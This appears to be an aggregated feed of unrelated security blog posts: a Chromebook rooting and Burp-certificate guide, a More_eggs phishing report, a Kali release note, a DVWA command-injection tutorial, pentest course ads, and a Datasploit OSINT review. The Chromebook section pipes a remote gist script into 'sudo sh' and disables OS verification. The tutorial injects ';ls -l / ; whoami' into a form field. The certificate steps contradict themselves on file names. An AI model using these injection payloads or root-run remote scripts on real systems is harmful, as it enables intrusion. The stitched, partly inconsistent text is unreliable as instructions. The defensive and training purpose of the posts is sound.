Enable Developer Mode
The method to get into development mode may be slightly different than what I list, depending on the Chromebook you are using.  I’m using an Asus R11. Please refer to Step 3 from the “Recover Your Chromebook” web page: https://support.google.com/chromebook/answer/1080595 for methods for other devices.

  1. Press ESC, Refresh, and the power button at the same time to load Recovery Mode.
  2. When the Recovery Mode screen loads, press Ctrl+D and then Enter
  3. The system will reboot and you will see the OS Verification warning screen.  Press Ctrl+D again.  From this point forward, until you revert back to a verified OS, you will have to press Ctrl+D at every boot up.
  4. Wait for about 15 minutes while the Chromebook prepares the Developer mode

Enable Debugging Features
This does not need to be done, but I highly recommend it so you can get a full bash terminal session through crosh (the Chrome OS shell).  This must be done on the first boot up after the Chromebook finishes installing Developer mode.

The Chromebook will reboot and then prompt you for a root password

Set sudo Password for the Dev Console in crosh
At this point, sign in to the Chromebook as normal.  Let the system create your profile and load the Google Play store.  Depending on your Google and Chrome settings, you may need to wait a bit as applications are automatically installed.

  1. Press Ctrl+Alt+F2 (or the Forward -> button) to get to the Developer Console.
  2. Login with root and the password you previously set up
  3. Type chromeos-setdevpasswd and press Enter.  You will be prompted for the sudo password.
  4. Type logout and press Enter
  5. Press Ctrl+Alt+F1 (or the Back <- button) to go back to the main screen

Disable OS Checks and Hardening
Before we can actually root the Chromebook, we need to disable some security settings.

  1. Press Ctrl+Alt+t to open the crosh window
  2. Type shell and press Enter to load a full shell
  3. Type sudo crossystem dev_boot_signed_only=0 and press Enter
  4. Type sudo /usr/libexec/debugd/helpers/dev_features_rootfs_verification and press Enter
  5. Reboot the Chromebook
    1. sudo reboot
  6. Once the system comes back, open another terminal window (Ctrl+Alt+t >> shell)
  7. Run the following command:  sudo /usr/share/vboot/bin/make_dev_ssd.sh –remove_rootfs_verification –partitions $(( $(rootdev -s | sed -r ‘s/.*(.)$/\1/’) – 1))
  8. Reboot the Chromebook (sudo reboot)

“Root” the Android Subsystem
Up until this point, we’ve just been prepping the system.  Running the following command will copy my modified script from GitHub and create an editable partition we can add items to (such as new CA certs).

curl -Ls https://gist.githubusercontent.com/neKuehn/f8eb14b226d42cda73ce173c0cdb2970/raw/5ae555f6156467741e8efbb40bc81eecb045a7e8/RootChromebookAndroid.sh | sudo sh

This script was modified from work that nolirium created (https://nolirium.blogspot.com/2016/12/android-on-chrome-os-rooting-shell.html).  My version does not add in the extra tools (BusyBox, etc) included in the original.

Once the script finishes (as shown above), reboot once again.  Once the Chromebook comes back online, we can install the Burp cert.

Configuring Android subsystem to use the Burp Certificate
We’re almost done but this portion takes multiple steps.  This is mainly because the Android subsystem wants the cert to be in a different format and named a specific way.

  1. Download the certificate from Burp and copy to the Chromebook.  If you copy the cert to the Downloads directory on the Chromebook, the path (in a shell window) is /home/user/<randomstring>/Downloads.  All of my following examples assume you downloaded the certificate to the Downloads directory
  2. Convert the cert to one used by Android (this can be done on linux system or on the Chromebook itself in a terminal window):
                openssl x509 -inform der -in cacert.der -out burp.pem
  3. Import the burp.pem file as an Authority in Chrome.  This is done in the GUI.
    1. Open Settings
    2. Expand “Advanced”
    3. Click on Manage Certificates
    4. Select the Authorities tab
    5. Click on Import.
    6. Find the burp.pem file and import it.
      1. Select all 3 check boxes for the Trust settings and click on OK
    7. Validate that the org-PortSwigger CA is now listed (as shown below)
  4. The CA should now also be listed as an Android User certificate
    1. Open Settings
    2. Click on the Google Play Store settings -> Manage Android preferences
    3. Click on Security
    4. Click on Trusted credentials
    5. Click on the User tab
    6. Validate the certificate is there as well. 
    7. If the cert is not listed, you can import the certificate by following the next few steps:
      • Go back to the Security menu
      • Select Install from SD card
      • Select Downloads in the Open from window
      • Select the burp.pem file and give it a name
      • The cert should now be listed as a Trusted User Credential
  5. Find the name of the certificate that was added to Android
    1. Open a shell (Ctrl+Alt+t and then shell) and run:
        sudo ls /opt/google/containers/android/rootfs/android-data/data/misc/user/0/cacerts-added
    2. Take note of the of the file name.  In my case, it is 9a5ba575.0.  We will be using this name for our new System CA certificate file we are about to create.
  6. Create the properly formatted certificate file. (This can be done on a linux server or on the Chromebook itself.  Where ever you created the burp.pem file):
     cat burp.pem > 9a5ba575.0
  7. Append the cert text to the file:
      openssl x509 -inform PEM -text -in burp.pem -out /dev/null >> 9a5ba580.0
  8. Copy our new cert file to the Android system:
      cp /home/user/<randomstring>/Downloads/9a5ba575.0 /opt/google/containers/android/rootfs/root/system/etc/security/cacerts/
  9. Reboot
  10. Validate that the PortSwigger CA is now listed in the Trusted Systems
    1. Open Settings
    2. Click on the Google Play Store settings -> Manage Android preferences
    3. Click on Security
    4. Click on Trusted credentials

You should now be able to proxy your traffic through Burp and intercept https traffic!  Often, when I do this, I send the data to my other laptop.  This is so I can save all of the proxy information (including required exclusions for android / google) to a dedicated wifi connection.  This is the current list of exclusions, but it is always growing:

  • accounts.google.com
  • accounts.google.us
  • accounts.gstatic.com
  • accounts.youtube.com
  • alt*.gstatic.com2
  • clients1.google.com
  • clients2.google.com
  • clients3.google.com
  • clients4.google.com
  • commondatastorage.googleapis.com
  • cros-omahaproxy.appspot.com
  • dl.google.com
  • dl-ssl.google.com
  • gweb-gettingstartedguide.appspot.com
  • m.google.com
  • omahaproxy.appspot.com
  • pack.google.com
  • policies.google.com
  • safebrowsing-cache.google.com
  • safebrowsing.google.com
  • ssl.gstatic.com
  • storage.googleapis.com
  • tools.google.com
  • www.googleapis.com
  • www.gstatic.com

Returning to Normal
Reverting back to the normal state is very easy.  First off, copy off the custom cert files (as they will be named the same thing if you choose to do this process again later).  Then perform the following steps:

  1. Run this command to put back the default Android Image:
      sudo mv /opt/google/containers/android/system.raw.img.bk /opt/google/containers/android/system.raw.img
  2. Reboot the Chromebook
  3. When the system boots to the OS Verification screen, instead of pressing Ctrl+D, press the spacebar.  This will wipe the Chromebook and put it back to the default configuration.

If you run into extreme issues, you should be able to powerwash the device.  At worse, you will have to reinstall the OS, which takes about an hour but is much easier on the Chromebook than other Android systems.  The full process to recover a Chromebook can be found here: https://support.google.com/chromebook/answer/1080595?hl=en.

Threat Actor Using Fake LinkedIn Job Offers to Deliver More_eggs Backdoor

Security researchers discovered that a threat actor is targeting LinkedIn users with fake job offers to deliver the More_eggs backdoor.

Since mid-2018, Proofpoint has observed various campaigns distributing More_eggs, each of which began with a threat actor creating a fraudulent LinkedIn profile. The attacker used these accounts to contact targeted employees at U.S. companies — primarily in retail, entertainment, pharmaceuticals and other industries that commonly employ online payments — with a fake job offer via LinkedIn messaging.

A week after sending these messages, the attacker contacted the targeted employees directly using their work email to remind them of their LinkedIn correspondence. This threat actor incorporated the targets’ professional titles into subject lines and sometimes asked recipients to click on a link to a job description. Other times, the message contained a fake PDF with embedded links.

These URLs all pointed to a landing page that spoofed a legitimate talent and staffing management company. There, the target received a prompt to download a Microsoft Word document that downloaded the More_eggs backdoor once macros were enabled. Written in JScript, this backdoor malware is capable of downloading additional payloads and profiling infected machines.

A Series of Malicious Activities on LinkedIn

The threat actor responsible for these campaigns appears to have had a busy 2019 so far. Proofpoint found ties between these operations and a campaign first disclosed by Krebs on Security in which phishers targeted anti-money laundering officers at U.S. credit unions. Specifically, the security firm observed similar PDF email attachments and URLs all hosted on the same domain.

This isn’t the first time an online actor has used LinkedIn for malicious activity, either. Back in September 2017, Malwarebytes Labs found evidence of attackers compromising peoples’ LinkedIn accounts and using them to distribute phishing links via private messages. Less than a year later, Alex Hartman of Network Solutions, Inc. disclosed a similar campaign in which threat actors attempted to spread malware via LinkedIn using fake business propositions.

How to Defend Against Backdoors Like More_eggs

Security professionals can help defend against backdoors like More_eggs by consistently monitoring endpoints and devices for suspicious activity. Security teams should simultaneously use real-time compliance rules to automate remediation in the event they observe behavior that appears to be malicious.

Additionally, experts recommend testing the organization’s phishing defenses by contacting a reputable penetration testing service that employs the same tactics, techniques and procedures (TTPs) as digital criminals.

The post Threat Actor Using Fake LinkedIn Job Offers to Deliver More_eggs Backdoor appeared first on Security Intelligence.

UPDATE: Kali Linux 2019.1 Release!

PenTestIT RSS Feed

Kali Linux 2019.1 is the latest Kali Linux release. This is the first 2019 release, which comes after Kali Linux 2018.4, that was made available in the month of October. This new release includes all patches, fixes, updates, and improvements since the last release – Kali Linux 2018.3, including a shiny new Linux kernel version 4.19.13 and upgrades to a lot of tools. Importantly, it also includes support for Banana Pi and Banana Pro.

Kali Linux 2019.1

What’s new in Kali Linux 2019.1?

The biggest tool updates is Metasploit 5.0, which includes database and automation APIsnew evasion capabilities, and a lot of usability improvements. As mentioned earlier, this version now supports for Banana Pi and Banana Pro ARM devices. Moreover, includes updated packages for theHarvester 3.0.0DBeaver 5.2.3, and more.

The following bugs have also been quashed in Kali Linux 2019.1:

  • 0005194[General Bug] System failed to boot after upgrading udev (rhertzog
  • 0005124[Kali Package Bug] failed to start LSB:thin initscript (rhertzog
  • 0004994[General Bug] Gnome may require entropy (Slow login) (rhertzog
  • 0005051[General Bug] vmtoolsd starting to early (rhertzog
  • 0005011[General Bug] xfce freezes (rhertzog
  • 0005096[Kali Package Bug] Freeradius-wpe package has unment dependencies (sbrun
  • 0005085/0005061[General Bug] xfsettingsd(in package of xfce4-setting) caused high cpu load every 2 or 3 sec. (steev
  • 0005086/0004970 : [Kali Package Improvement] For Peepdf functionality, add build and add PyV8 package to Kali repo (sbrun
  • 0005087/0005064 : [Kali Package Bug] Metasploit Function ‘info’ Bug (sbrun
  • 0004996[Kali Package Bug] Get rid of python-restkit in Kali (rhertzog
  • 0005254[General Bug] WPScan does not start (sbrun)

Download Kali Linux 2019.1:

As we all know, you can simply run apt update && apt -y full-upgrade to update to the latest Kali Linux version. Or, if you would like to download ISO images (kali-linux-2019.1-amd64.iso/kali-linux-2019.1-i386.iso), visit this page. However, if you want to download VMWare, VirtualBox, Hyper-V or ARM images (such as Kali-Linux-2019.1-vm-amd64.7z), simply go on to this page.

Do not forget to check out the updated Kali Linux official documentation too! Also, don’t forget to check out the online version of Kali Linux Revealed book here.

The post UPDATE: Kali Linux 2019.1 Release! appeared first on PenTestIT.

OWASP’s Most Wanted

So you ask who is this OWASP and why do I care?

Well, let’s hear it directly from them:  “Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software.  Our mission is to make software security visible, so that individuals and organizations are able to make informed decisions. OWASP is in a unique position to provide impartial, practical information about AppSec to individuals, corporations, universities, government agencies, and other organizations worldwide.  Operating as a community of like-minded professionals, OWASP issues software tools and knowledge-based documentation on application security.” (https://OWASP.org)

Whether you’re a pentester or a developer, you should be well versed in OWASP and the information they provide.  One of their most well-known offerings is their Top 10 Application Security Risks.  OWASP lists Injection as the top #1 vulnerability in their Top 10 list of application vulnerabilities.   

So, what is Injection?  According to OWASP, Injection can result in data loss or corruption, a lack of accountability or a denial of access.  This is done by breaking out of a fixed context within the page. For example, if the page expects user input to only be used in a non-executable context, but an attacker can escape that context, then the input might be executable. Things like SQL injection (SQLi) and Cross-site Scripting (XSS) are common examples of injection. In XSS, an unhandled quote character might break out of the HTML attribute and allow malicious JavaScript to execute in the browser. With SQLi, an unhandled SQL control character may allow a malicious SQL statement to execute against the database. A quick list of different attacks are found on OWASP’s Attack Category page, https://www.owasp.org/index.php/Category:Injection.

Today, let’s look at Command Injection together.  This occurs when the data added to the input contains code the attacker wants to be run by the operating system of the system hosting the vulnerable web page or application.

So, let’s see how this is attack works in an application and how we can exploit it.  I will be using SamuraiWTF in this demonstration. You can download the current release of Samurai from GitHub

Once I have Samurai loaded up I am going to launch Burp.  As shown below, Burp can be found by right clicking on screen in the VM.


As an aside, if you have never used Burp before I recommend taking a look at another one of our posts found at the following link https://blog.secureideas.com/2018/03/burp-suite-continuing-the-saga.

Once I have Burp running, I want to set up my Firefox browser to use Burp. Make sure you change your proxy configuration, as shown below, so all traffic will be routed through Burp.

Also I need to make sure Intercept is turned off in Burp. Otherwise, Burp will hold all web requests and wait for you to manually forward them to the server.

Next I open up the DVWA application by typing http://dvwa.wtf in my Firefox browser.  Now I need to go through and map out the application by clicking on every function in the application. Additionally for this example to work, I need to change the security level to Low.

Once I have mapped out each function I can go back to Burp and look at the Site map tab under the Target tab and find the Post request from http://dvwa.wtf/vulnerabilities/exec/.

Now I am going to send that action to Repeater to manipulate the request. My goal is to break out of the context the application is executing. (Note the Content Length of the request to compare it later.)

As a quick tip, when using Repeater you always want to press the Go button prior to manipulating the request. This will allows us to verify that the session is still good and there is no anti-replay protections.

Now we are going to input a payload into the request to see what happens. I am going to replace ip=localhost&Submit=Submit with ip=localhost;ls -l / ; whoami;uname-a&Submit=Submit. Notice that I am adding commands and a ; (semi-colon) to attempt to break the context the application is running the payload within. You can use any system commands but using something like these that return output and aren’t interactive are often best.

I then press the Go button to have Burp Suite send the request to the application. If I look at the response, we can see the payload appears to have executed. We see this because the response contains the output from the commands I injected. In the screenshot below, we see the directory listing and the username the application is running as root.

So that shows an example of how Command Injection can be found and exploited.  Stay tuned to https://blog.secureideas.com for more great articles and tutorials similar to this one.  You can also join our Slack channel at www.professionallyevil.com where you can chat with fellow security professionals.


Introduction to Pentesting: From n00b to Professional

So, you want to become a pentester? Penetration testing not only is a financially rewarding career, but professionals in this field also believe this career path to be personally fulfilling. Although, it requires some serious skills to get there! Here’s an introduction to penetration testing and how to take your first step in this field.

Why Penetration Testing Is Important

Penetration testing (pentesting) consists of testing a computer system, network, web application, etc. to find security vulnerabilities before malicious actors do. In other words, Penetration Testers perform ‘deep investigations’ of the remote system security flaws.

This activity requires methodology and skills. Penetration testers, unlike malicious hackers, must test for any and all vulnerabilities, not just the ones that might grant them root access to a system.

Penetration testing is NOT about getting root!!!

The ultimate goal of penetration testers is not to get access as fast as possible, but to thoroughly identify the security posture of an organization, and recommend the right solution/s to fix the vulnerabilities found.

The most important part of the penetration testing methodology — the reporting phase — is often the most looked-upon. That’s a BIG mistake! Indeed, clients will usually judge a pentester’s work based on the quality of his report. This is why writing skills can really come in handy, but more on the skills necessary to succeed in this field later in this article.

Penetration testers, moreover, cannot destroy their clients’ infrastructures. Pentesting requires a thorough understanding of attack vectors and their potential.

In a world ever-more connected, everything can be tested. Here are some of the most common types of pentests:

  • Network Pentesting,
  • Wireless Network Pentesting,
  • Web Application Pentesting,
  • Mobile Application Pentesting,
  • Wifi Pentesting,
  • System Pentesting,
  • Servers Pentesting,
  • IoT Pentesting,
  • Cloud-based Application Pentesting,

But also…

  • Human/Employees can be an organization’s weakest link. To ensure that all employees aware of their risks, and to keep a company secure, Penetration Testers might be asked to perform Social Engineering tests.

Learn the basics of social engineering and how to use popular credential grabbing tools like Modlishka and SET in this webinar by The Ethical Hacker Network and Erich Kron of KnowBe4.

Needless to say, pentesting is a highly practical job! To become a Penetration Tester, you’ll need to learn the theories, methodologies, and most importantly, the hands-on techniques to carry on your tasks.

Below are some of the most important skills to get you started.

The Skills Penetration Testers Need To Succeed

To become a junior penetration tester, you’ll need to have a strong understanding of the networking basics:

  • Routing, Forwarding, TCP/IP
  • Traffic analysis with Wireshark

But also know the pentesting methodology:

  • Information gathering
  • Footprinting and scanning
  • Vulnerability assessments
  • Exploitation 
  • Reporting

And most importantly, know the most common hacking techniques and tools by heart:

  • How web attacks works
  • Basic usage of Nmap, Nessus, BurpSuite, and Metasploit
  • Understanding Buffer Overflows
  • How XSS and SQL Injection work
  • How to hack the human brain (social engineering)

Want to learn the skills and techniques mentioned above? Skip to the next part to see how you can get started.

How To Get Started?

So, you want to become a penetration tester? You might just be in luck!

In the occasion of our Beginners’ Month, we are offering the Penetration Testing Student (PTS) training course in Elite Edition for free with every enrollment in the Penetration Testing Professional (PTP) training course.

Combined together, these two of our best-selling training courses will take you from script kiddie to a more advanced and professional penetration tester level.

We pride ourselves in offering highly practical and self-paced training courses, so you’ll be able to learn new penetration testing skills and techniques from the comfort of your home, at your own pace.

By enrolling in these two courses, you’ll get lifetime access to

  • Thousands of slide course materials,
  • Hundreds of video course materials,
  • Hours of virtual labs based on real-life scenarios,
  • A shiny certificate to prove your practical skills!

Yes, that’s right! You’ll get the chance to prove your skills and become certified eLearnSecurity Junior Penetration Tester (eJPT) after completing the PTS training course and eLearnSecurity Certified Professional Penetration Tester (eCPPT) after the PTP training course.

Aspiring to become a professional Penetration Tester? Enroll in PTPv5 in Elite Edition before February 28 to receive PTS in Elite Edition at no additional cost!
CLAIM YOUR FREE COURSE | GET A FREE TRIAL

Connect with us on Social Media:

Twitter | Facebook | LinkedIn | Instagram

How to Test Your Security Controls for Small/Medium Businesses

We often get contacted by small businesses requesting their first penetration test because of compliance reasons, or because of “industry best practices,” or just to get an idea of how bad things really are. In many of those cases, their environment isn’t nearly mature enough to make a pentest worthwhile. Sometimes they’re insistent and we work with them to make the test as helpful as we can, but usually that’s like shooting fish in a barrel.  

Over the years I’ve found that a better approach is to discuss the motives for getting a pentest, and then explore other options that might be more efficient and effective. While this might cost us a sale, in the long run it’s better for the client, and ultimately makes them a better customer.  And let’s be honest, while it’s fun to get Domain Admin access by 10am Monday morning, that usually makes for a pretty boring test. So this article is intended to be a roadmap for those smaller businesses, to guide them towards an improved security posture.

The first step is to get the horse in front of the cart: we need to understand the point of security testing so that we’re not just testing for the sake of the test. Even if the compliance auditors are forcing the engagement, there’s no reason not to get the most bang for your bucks. All tests are designed to determine whether or not the subject is performing as expected. Whether it’s a standardized test in grade school, a drug test, or a penetration test; the ultimate goal is always to determine whether our expectations match reality.

In your business or organization, you’ve spent countless hours and dollars on security controls to protect your assets. The simple goal of any security testing should be to confirm if those controls are successful at lowering risk. If they’re not, then you may need to rethink how you’re allocating those resources. And if the controls are successful, good testing will help you find the limits of those controls and where additional efforts are required.

So, where do we start?  If the goal is to assess the success of your controls, then you need to document those controls and outline the threats they are expected to mitigate. It’s also good to brainstorm other potential threats to the organization. Possible threats can include anything that could cost the organization time, money or manpower, as well as anything that could hinder future sales, such as downtime and negative press. It’s important to have a strong understanding of every possible threat so that you can map specific security controls to addressing those threats.

This can often be done internally if you have competent staff, but may benefit from the assistance of a knowledgeable third party. At Secure Ideas we call this a Gap Analysis. The goal of that sort of assessment is to get a very high-level understanding of the controls in place with an eye towards finding gaps in coverage.

Once you have an outline of possible threats, and a list of security controls that are intended to prevent those threats, you can start to look for areas of weakness. There’s really no limit to how simple or sophisticated this testing needs to be. For example, if you have a firewall with a built-in IPS service that’s supposed to block network scanning, then you can perform a network scan with a tool like nmap and see what happens.  I gave a talk at ShowMeCon 2018 on how to assess third party MSSPs in this way, but the principles apply to testing your own controls as well. You can view that here: https://www.youtube.com/watch?v=_SF4vw_mVnY

For more advanced organizations, we also perform Architecture Reviews that are a bit more involved than a Gap Analysis.  These are interview-based assessments in cooperation with the client’s staff in which we discuss all of the different areas of information security. During an Arch Review, we review any available documentation (policies & procedures, configuration standards, etc) looking for areas that haven’t received a proper amount of focus. The goal of the Arch Review is to get as much detail from as many different employees as possible. This allows us to find those places where the actual work doesn’t always line up with the documented procedures.

Another option is to perform a Vulnerability Assessment. This is often done in conjunction with an Architecture Review. This assessment usually involves the use of an automated scanner on the client’s network. For clients that are already doing regular vulnerability scans, the focus of this type of assessment may lean towards analyzing existing scan data as well as reviewing the scanner configuration. For clients who aren’t performing regular scanning, this assessment can help determine whether the expected procedures such as patching and upgrades are actually being followed.

And finally, for organizations that are fairly confident in their existing controls, the Penetration Test is designed to simulate a real-world attack, to exploit vulnerabilities, and to plunder and pillage sensitive data. There are several different types of penetration tests with focuses on internal or external networks, web applications, mobile applications, wireless, etc. But they all have the same overarching goal: to assess the security of the target systems and demonstrate real-world business risk so that executives can accurately understand the potential costs of an attack.

In my experience, many organizations that come to us for their first penetration test aren’t ready for it.  They’re moving down that path, but they’re not at the point of having reasonable confidence in their existing controls. Sometimes they don’t have a choice because of compliance/legal/regulations/etc. But sometimes they do. I always try to open up the discussion to better understand the goals of the testing and what they’re hoping to receive.  

In general, my advice is for organizations to review the CIS 20 Controls (https://www.cisecurity.org/controls/). If they can’t put a checkmark beside most of those controls, then we probably need to start further up the chain with something like an Architecture Review. One of the advantages of partnering with a company like Secure Ideas is that we have the experience and flexibility to craft an assessment that meets each unique customer. Regardless of where they are along the path of becoming more secure, we love having the opportunity to make our clients better.

If you’re trying to up your security game, or aren’t sure exactly how to proceed, let us know. You can reach me directly at nathan@secureideas.com.

HIMSS 2019 – Champions of Security Unite

Organizations of all sizes and industries face increasing challenges in safeguarding vast amounts of sensitive data, with Health Care being no different. The loss of Protected Health Information (PHI) incurs not only heavy fines and brand damage, but potentially everlasting damage to affected patients.

According to the Ponemon Institute: The average total cost of a data breach went up 6.8% in 2018 for an average cost of $3.86 million. The financial burden shouldered by these businesses, is why we do our best to get out in front of an attack by being proactive rather than reactive.  A mature and resilient security posture can only be achieved by taking the necessary precautions, having the proper controls in place, and relying on industry experts.

Security Challenges Faced by Healthcare Organizations

A dedicated, persistent, and sophisticated attacker is attracted to valuable medical and identity information, and won’t be thwarted easily, which is why an organization must remain vigilant.  Complex and vast regulatory expectations require increased focus and budget dollars to comply with HIPAA security and privacy requirements.  Without a strong security program in place, it becomes increasingly likely that a successful attack against your organization is on the horizon.

Reduce Your Threat Level and Enhance Your Security Posture

Healthcare organizations need to manage a constantly evolving IT environment and threat landscape. Understanding the exposure of not only their physical environment, but virtual networks, cloud services, mobile devices, medical devices, and web applications can be quite daunting. Risks need to be identified and prioritized as they emerge based on the specific requirement of the organization.

Secure Ideas Has Solutions to Help

The first step in finding a solution is to be cognizant of the current situation.  A security architecture review takes a collaborative approach in understanding the vast IT architecture that exists and reasons for various design decisions.  We’ll work with your organization to both identify and control vulnerabilities or gaps that exist within configuration issues, policies, procedures, and controls.  Crafted from decades of experience, our services are specifically designed to not only identify vulnerabilities, but to provide actionable recommendations and to promote a Security State of Mind.

Find Secure Ideas at HIMSS: 

If you’ll be attending HIMSS February 11-15th, and would like to stop by our booth for a more in depth conversation on ways we can assist your organization, we’d be happy to speak with you further.  You can find us at:  Booth #6485

Secure Ideas CEO, Kevin Johnson, will also be speaking at HIMSS:
Attacking the Ramparts: Offensively Securing Your Organization
Thursday, February 14th – 1:15pm – 2:00pm
Orange County Convention Center
Hall A
Booth 400
Cybersecurity Theater A

#MyInfoSecStory Contest: Win The Course Of Your Choice

Has eLearnSecurity or one of our training courses helped you or your career? We’d love to know that story! Get a chance to win your favorite course this month with our #MyInfoSecStory LinkedIn contest. Discover how to enter and the guidelines for your chance win below.

Reading from a mobile? Click on the Infographic to enlarge it.

Get your keyboards in order — Ready, set, go!

Click the links below to share this contest with your friends and colleagues:
.LINKEDIN.  |  .TWITTER.  🐦

Connect with us on Social Media:

Twitter | Facebook | LinkedIn | Instagram

Toolsmith #127: OSINT with Datasploit

I was reading an interesting Motherboard article, Legal Hacking Tools Can Be Useful for Journalists, Too, that includes reference to one of my all time OSINT favorites, Maltego. Joseph Cox's article also mentions Datasploit, a 2016 favorite for fellow tools aficionado, Toolswatch.org, see 2016 Top Security Tools as Voted by ToolsWatch.org Readers. Having not yet explored Datasploit myself, this proved to be a grand case of "no time like the present."
Datasploit is "an #OSINT Framework to perform various recon techniques, aggregate all the raw data, and give data in multiple formats." More specifically, as stated on Datasploit documentation page under Why Datasploit, it utilizes various Open Source Intelligence (OSINT) tools and techniques found to be effective, and brings them together to correlate the raw data captured, providing the user relevant information about domains, email address, phone numbers, person data, etc. Datasploit is useful to collect relevant information about target in order to expand your attack and defense surface very quickly.
The feature list includes:
  • Automated OSINT on domain / email / username / phone for relevant information from different sources
  • Useful for penetration testers, cyber investigators, defensive security professionals, etc.
  • Correlates and collaborate results, shows them in a consolidated manner
  • Tries to find out credentials,  API keys, tokens, sub-domains, domain history, legacy portals, and more as related to the target
  • Available as single consolidating tool as well as standalone scripts
  • Performs Active Scans on collected data
  • Generates HTML, JSON reports along with text files
Resources
Github: https://github.com/datasploit/datasploit
Documentation: http://datasploit.readthedocs.io/en/latest/
YouTube: Quick guide to installation and use

Pointers
Second, a few pointers to keep you from losing your mind. This project is very much work in progress, lots of very frustrated users filing bugs and wondering where the support is. The team is doing their best, be patient with them, but read through the Github issues to be sure any bugs you run into haven't already been addressed.
1) Datasploit does not error gracefully, it just crashes. This can be the result of unmet dependencies or even a missing API key. Do not despair, take note, I'll talk you through it.
2) I suggest, for ease, and best match to documentation, run Datasploit from an Ubuntu variant. Your best bet is to grab Kali, VM or dedicated and load it up there, as I did.
3) My installation guidance and recommendations should hopefully get you running trouble free, follow it explicitly.
4) Acquire as many API keys as possible, see further detail below.

Installation and preparation
From Kali bash prompt, in this order:

  1. git clone https://github.com/datasploit/datasploit /etc/datasploit
  2. apt-get install libxml2-dev libxslt-dev python-dev lib32z1-dev zlib1g-dev
  3. cd /etc/datasploit
  4. pip install -r requirements.txt
  5. mv config_sample.py config.py
  6. With your preferred editor, open config.py and add API keys for the following at a minimum, they are, for all intents and purposes required, detailed instructions to acquire each are here:
    1. Shodan API
    2. Censysio ID and Secret
    3. Clearbit API
    4. Emailhunter API
    5. Fullcontact API
    6. Google Custom Search Engine API key and CX ID
    7. Zoomeye Username and Password
If, and only if, you've done all of this correctly, you might end up with a running instance of Datasploit. :-) Seriously, this is some of the glitchiest software I've tussled with in quite a while, but the results paid handsomely. Run python datasploit.py domain.com, where domain.com is your target. Obviously, I ran python datasploit.py holisticinfosec.org to acquire results pertinent to your author. 
Datasploit rapidly pulled results as follows:
211 domain references from Github:
Github results
Luckily, no results from Shodan. :-)
Four results from Paste(s): 
Pastebin and Pastie results
Datasploit pulled russ at holisticinfosec dot org as expected, per email harvesting.
Accurate HolisticInfoSec host location data from Zoomeye:

Details regarding HolisticInfoSec sub-domains and page links:
Sub-domains and page links
Finally, a good return on DNS records for holisticinfosec.org and, thankfully, no vulns found via PunkSpider

DataSploit can also be integrated into other code and called as individual scripts for unique functions. I did a quick run with python emailOsint.py russ@holisticinfosec.org and the results were impressive:
Email OSINT
I love that the first query is of Troy Hunt's Have I Been Pwned. Not sure if you have been? Better check it out. Reminder here, you'll really want to be sure to have as many API keys as possible or you may find these buggy scripts crashing. You'll definitely find yourself compromising between frustration and the rapid, detailed results. I put this offering squarely in the "shows much promise category" if the devs keep focus on it, assess for quality, and handle errors better.
Give Datasploit a try for sure.
Cheers, until next time...

Hacking WPA Enterprise with Kali Linux

Admittedly, somewhat of a click-bait blog post title - but bear with us, it's for a good reason. Lots of work goes on behind the scenes of Kali Linux, tools get updated every day and interesting new features are added constantly. Most of these tool updates and feature additions go unannounced, and are then discovered by inquisitive users - however this time, we had to make an exception.

Toolsmith Release Advisory: Kali Linux 2016.2 Release

On the heels of Black Hat and DEF CON, 31 AUG 2016 brought us the second Kali Rolling ISO release aka Kali 2016.2. This release provides a number of updates for Kali, including:
  • New KDE, MATE, LXDE, e17, and Xfce builds for folks who want a desktop environment other than Gnome.
  • Kali Linux Weekly ISOs, updated weekly builds of Kali that will be available to download via their mirrors.
  • Bug Fixes and OS Improvements such as HTTPS support in busybox now allowing the preseed of Kali installations securely over SSL. 
All details available here: https://www.kali.org/news/kali-linux-20162-release/
Thanks to Rob Vandenbrink for calling out this release. 

Kali Rolling ISO of DOOM, Too.

A while back we introduced the idea of Kali Linux Customization by demonstrating the Kali Linux ISO of Doom. Our scenario covered the installation of a custom Kali configuration which contained select tools required for a remote vulnerability assessment. The customised Kali ISO would undergo an unattended autoinstall in a remote client site, and automatically connect back to our OpenVPN server over TCP port 443. The OpenVPN connection would then bridge the remote and local networks, allowing us full "layer 3" access to the internal network from our remote location. The resulting custom ISO could then be sent to the client who would just pop it into a virtual machine template, and the whole setup would happen automagically with no intervention - as depicted in the image below.

How to become a pentester

Intro I receive a lot of emails.  (Please don’t make it worse, thanks!)   Unfortunately I don’t have as much spare time as I used to, or would like to, so I often have no other choice than to redirect questions to our forums or our IRC channel (#corelan on freenode), hoping that other members […]

In Defense of Ethical Hacking

Pete Herzog, wrote an interesting piece on Dark Matters (Norse’s blog platform) a while back, and I’ve given it a few days to sink in because I didn’t want my response to be emotional. After a few days I’ve re-read the post a few more times and still have no idea where Pete, someone I otherwise is fairly sane and smart (see his bio - http://blog.norsecorp.com/author/pherzog/) , gets this premise he’s writing about. In fact, it annoyed me enough that I wrote up a response to his post… and Pete, I’m confused where this point of view comes from! I’d genuinely like to know… I’ll reach out and see if we can figure it out.

— For the sake of this blog post, I consider ethical hacking and penetration testing to effectively be the same thing. I know not everyone agrees, and that’s unfortunate, but I guess you can’t please everyone.

So here on my comments on Pete’s blog post titled “The Myth of Ethical Hacking (http://blog.norsecorp.com/2015/01/27/the-myth-of-ethical-hacking/)”



I thought reacting is what you did when you weren’t secure. And I thought ethical hacking was proactive, showing you could take advantage of opportunities left by the stupid people who did the security.
— Boy am I glad he doesn’t think this way anymore. Reacting is part of life, but it’s not done because you’re insecure, it’s done because business and technology along with your adversaries is dynamic. It’s like standing outside without an umbrella. It’s not raining… but if you stand there long enough you’ll need an umbrella. It’s not that you are stupid, it’s that weather changes. If you’re in Chicago, like I am, this happens about every 2.7 seconds.
I also thought ethical hacking and security testing were the same thing, because while security testing focused on making sure all security controls were there and working right and ethical hacking focused on showing a criminal could penetrate existing security controls, both were about proactively learning what needed to be better secured.
— That’s an interesting distinction. I can’t say I believe this is any more than a simple different in word choice. Isn’t this all about validation of the security an organization thinks they have, versus the reality of how attackers act and what they will target? I guess I could be wrong, but these terms: vulnerability testing, penetration testing, ethical hacking, security testing — they create confusion in the people trying to consume these services, understand security, and hire. Do they have any real value? I this this is one reason standards efforts by people in the security testing space were started, to demystify, de-obfuscate, and lessen confusion. Clearly it’s not working as intended?
Ethical hacking, penetration testing, and red-teaming are still considered valid ways to improve security posture despite that they test the tester as much, if not more, than the infrastructure.
